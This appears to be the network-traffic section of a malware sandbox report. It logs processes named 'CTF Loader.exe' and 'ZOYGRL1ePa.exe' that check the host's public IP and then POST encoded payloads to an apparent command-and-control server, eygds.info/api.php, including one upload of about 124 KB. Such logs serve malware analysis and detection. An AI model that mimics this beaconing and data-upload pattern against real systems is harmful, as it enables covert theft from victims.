Dec 30, 2024 01:57:13.134175062 CET	586	OUT	Data Raw: 70 3d 2f 4b 48 71 4f 5a 6e 6d 50 4a 49 78 79 31 73 6a 44 56 46 4e 52 70 56 31 25 32 42 25 32 42 45 37 71 41 77 32 37 52 72 62 56 7a 39 54 36 45 33 38 52 5a 33 48 57 59 7a 5a 75 6c 70 35 43 66 6c 6f 72 66 45 4a 58 63 47 66 49 54 6c 2f 74 48 35 33 Data Ascii: p=/KHqOZnmPJIxy1sjDVFNRpV1%2B%2BE7qAw27RrbVz9T6E38RZ3HWYzZulp5CflorfEJXcGfITl/tH53qbP3ybh%2B5ScPDbV9V9zxVf7OzvRulNtt7btP9nujd/xgdkYTX%2BYtZoZGMd/Uw3tOf%2BKLVO4WRUpmnABRr0f17wqLTpAlZ4fcnOU6AQhjn0IzCbWGw8j3JtoR0TcUuHUaDyqBpddeGPpuz1u01/qXjUeeim0
Dec 30, 2024 01:57:13.326942921 CET	1236	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 53 65 70 20 32 30 32 31 20 31 32 3a 34 39 3a 30 33 20 47 4d 54 0d 0a 65 74 61 67 3a 20 22 39 39 39 2d 36 31 35 35 62 32 33 66 2d 39 62 31 65 32 64 61 38 31 30 39 64 34 36 64 33 3b 3b 3b 22 0d 0a 61 63 63 65 70 74 2d 72 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 32 34 35 37 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 33 30 20 44 65 63 20 32 30 32 34 20 30 30 3a 35 37 3a 31 33 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 70 6c 61 74 66 6f 72 6d 3a 20 68 6f 73 74 69 6e 67 65 72 0d 0a 70 61 6e 65 6c 3a 20 68 70 61 6e 65 6c 0d 0a 0d 0a 3c 21 44 4f 43 54 59 [TRUNCATED] Data Ascii: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:57:13 GMTserver: LiteSpeedplatform: hostingerpanel: hpanel<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { [TRUNCATED]
Dec 30, 2024 01:57:13.326962948 CET	1236	IN	Data Raw: 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 Data Ascii: position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="descript
Dec 30, 2024 01:57:13.326976061 CET	341	IN	Data Raw: 65 64 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 35 30 30 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ed"><img style="width:500px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	158.101.44.242	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:57:24.369594097 CET	68	OUT	GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
Dec 30, 2024 01:57:24.919612885 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 00:57:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e2538b4c845ac404e7f338e325777d8b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	158.101.44.242	80	3716	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:57:32.433602095 CET	68	OUT	GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
Dec 30, 2024 01:57:32.981987000 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 00:57:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b66d36e4c83a616434509bef5b1e6943 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:57:40.371249914 CET	278	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue Connection: Keep-Alive
Dec 30, 2024 01:57:40.725095034 CET	286	OUT	Data Raw: 70 3d 32 71 48 30 4b 42 48 48 6c 70 4d 72 49 79 6b 47 2f 59 56 69 37 4a 56 31 25 32 42 25 32 42 45 37 71 41 77 32 37 52 72 62 56 7a 39 54 36 45 33 38 52 5a 33 48 57 59 7a 5a 75 6c 70 35 43 66 6c 6f 72 66 45 4a 58 63 47 66 49 54 6c 2f 74 48 35 33 Data Ascii: p=2qH0KBHHlpMrIykG/YVi7JV1%2B%2BE7qAw27RrbVz9T6E38RZ3HWYzZulp5CflorfEJXcGfITl/tH53qbP3ybh%2B5R%2BoQfDJYdxY%2BLeL4CfPUNjeMyQYy%2BhznJ/iR%2B8EfLeOyp5yqnHAxQIhLcFZI8Mkffz42B7krq2u7OXqqle7sxfGYqM4gionehlh7cV962TIKR3V7cktRe%2BNwMtZWMxPYK2AGL8riBZtj
Dec 30, 2024 01:57:40.931694031 CET	1236	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 53 65 70 20 32 30 32 31 20 31 32 3a 34 39 3a 30 33 20 47 4d 54 0d 0a 65 74 61 67 3a 20 22 39 39 39 2d 36 31 35 35 62 32 33 66 2d 39 62 31 65 32 64 61 38 31 30 39 64 34 36 64 33 3b 3b 3b 22 0d 0a 61 63 63 65 70 74 2d 72 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 32 34 35 37 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 33 30 20 44 65 63 20 32 30 32 34 20 30 30 3a 35 37 3a 34 30 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 70 6c 61 74 66 6f 72 6d 3a 20 68 6f 73 74 69 6e 67 65 72 0d 0a 70 61 6e 65 6c 3a 20 68 70 61 6e 65 6c 0d 0a 0d 0a 3c 21 44 4f 43 54 59 [TRUNCATED] Data Ascii: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:57:40 GMTserver: LiteSpeedplatform: hostingerpanel: hpanel<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { [TRUNCATED]
Dec 30, 2024 01:57:40.931755066 CET	1236	IN	Data Raw: 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 Data Ascii: position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="descript
Dec 30, 2024 01:57:40.931793928 CET	341	IN	Data Raw: 65 64 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 35 30 30 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ed"><img style="width:500px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just
Dec 30, 2024 01:57:40.940134048 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 318 Expect: 100-continue
Dec 30, 2024 01:57:41.092346907 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:57:41.092664003 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:57:41 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http
Dec 30, 2024 01:57:41.092699051 CET	1236	IN	Data Raw: 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 Data Ascii: -equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your we
Dec 30, 2024 01:57:41.092731953 CET	279	IN	Data Raw: 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 73 74 2e 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: t.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not intentional.</p> </d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:57:51.315201044 CET	278	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 586 Expect: 100-continue Connection: Keep-Alive
Dec 30, 2024 01:57:51.662632942 CET	586	OUT	Data Raw: 70 3d 2f 4b 48 71 4f 5a 6e 6d 50 4a 49 78 79 31 73 6a 44 56 46 4e 52 70 56 31 25 32 42 25 32 42 45 37 71 41 77 32 37 52 72 62 56 7a 39 54 36 45 33 38 52 5a 33 48 57 59 7a 5a 75 6c 70 35 43 66 6c 6f 72 66 45 4a 58 63 47 66 49 54 6c 2f 74 48 35 33 Data Ascii: p=/KHqOZnmPJIxy1sjDVFNRpV1%2B%2BE7qAw27RrbVz9T6E38RZ3HWYzZulp5CflorfEJXcGfITl/tH53qbP3ybh%2B5ScPDbV9V9zxVf7OzvRulNt3edVj4tgJkPxgdkYTX%2BYtZoZGMd/Uw3tOf%2BKLVO4WRUpmnABRr0f17wqLTpAlZ4fcnOU6AQhjn0IzCbWGw8j3JtoR0TcUuHUaDyqBpddeGPpuz1u01/qXjUeeim0
Dec 30, 2024 01:57:51.883547068 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:57:51.883810997 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:57:51 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:57:51.883847952 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks
Dec 30, 2024 01:57:51.883882999 CET	316	IN	Data Raw: 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c Data Ascii: px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49849	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:11.843130112 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 924 Expect: 100-continue
Dec 30, 2024 01:58:12.193805933 CET	924	OUT	Data Raw: 70 3d 30 68 7a 75 44 39 46 39 7a 74 79 47 73 71 48 69 69 4f 54 32 72 6d 33 63 4e 6b 70 59 32 6f 30 74 64 45 33 70 58 52 25 32 42 69 6e 4d 7a 59 62 6c 48 35 41 74 35 59 38 62 56 30 72 41 69 44 59 37 4d 46 68 34 79 5a 7a 2f 55 6b 4a 45 44 6e 73 48 Data Ascii: p=0hzuD9F9ztyGsqHiiOT2rm3cNkpY2o0tdE3pXR%2BinMzYblH5At5Y8bV0rAiDY7MFh4yZz/UkJEDnsHiWnAK5VTWPi8R7qEAdCyqkSDadRXjzPUglSEv6LQk6aCWwwi02LX4Yb/0Zd93ojmhbn3r3abBzR27NfwzMRHbGHftj1p4h1gEM6FU7xEhoi/4WQyNcJ3xdp%2BKf0M%2BMOzHWUEBxcnTs6fSvdldySZPklRrRojB
Dec 30, 2024 01:58:12.391660929 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:58:12.391722918 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:58:12 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:58:12.391760111 CET	224	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" c
Dec 30, 2024 01:58:12.391769886 CET	1236	IN	Data Raw: 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 73 74 2e 20 53 74 61 72 74 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 6e 20 74 68 65 20 63 68 65 61 70 2e 22 3e 0a 20 20 20 20 Data Ascii: ontent="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap
Dec 30, 2024 01:58:12.391779900 CET	92	IN	Data Raw: 63 69 64 65 6e 74 20 74 68 61 74 20 77 61 73 20 6e 6f 74 20 69 6e 74 65 6e 74 69 6f 6e 61 6c 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e Data Ascii: cident that was not intentional.</p> </div> </div></body></html>
Dec 30, 2024 01:58:12.392358065 CET	257	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 124322 Expect: 100-continue
Dec 30, 2024 01:58:12.542103052 CET	25	IN	HTTP/1.1 100 Continue
